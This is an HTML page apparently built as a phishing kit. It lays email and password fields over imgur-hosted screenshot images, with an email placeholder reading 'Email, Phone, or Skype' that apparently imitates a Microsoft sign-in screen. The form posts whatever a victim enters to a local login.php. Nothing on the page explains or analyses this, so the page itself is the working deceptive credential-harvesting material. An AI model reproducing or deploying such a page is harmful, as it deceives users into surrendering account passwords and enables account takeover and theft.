<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Document</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1365px; height:657px; z-index:0"><img src="https://i.imgur.com/wlE6BMa.jpg" alt="" title="" border=0 width=1365 height=657></div>

<div id="image2" style="position:absolute; overflow:hidden; left:492px; top:302px; width:211px; height:70px; z-index:1"><img src="https://i.imgur.com/AsntyjQ.jpg" alt="" title="" border=0 width=211 height=70></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:353px;left:507px;top:251px;z-index:3;height: 41px;" required placeholder="Email, Phone, or Skype">
<input name="formtext2" type="password" style="position:absolute;width:353px;left:507px;top:309px;z-index:4;height: 41px;" required placeholder="Password">
<div id="formimage1" style="position:absolute; left:747px; top:416px; z-index:5"><input type="image" name="formimage1" width="115" height="40" src="https://i.imgur.com/92JWLzR.jpg"></div>
</form>


</body>
</html>
